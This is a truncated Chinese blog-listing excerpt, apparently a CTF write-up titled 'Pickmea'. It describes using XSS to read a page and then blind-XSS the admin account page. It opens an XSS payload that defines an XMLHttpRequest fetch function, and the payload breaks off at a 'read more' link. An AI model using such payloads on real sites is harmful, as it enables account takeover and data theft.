Pickmea

摘要： 通过xss第一次取得网页内容，然后获取到管理员账号页面进行二次盲打。js需要保留script部分其余去除。 <html><p id='d1'></p> <script> function get(url) { try { var req = new XMLHttpRequest(); req.ope 阅读全文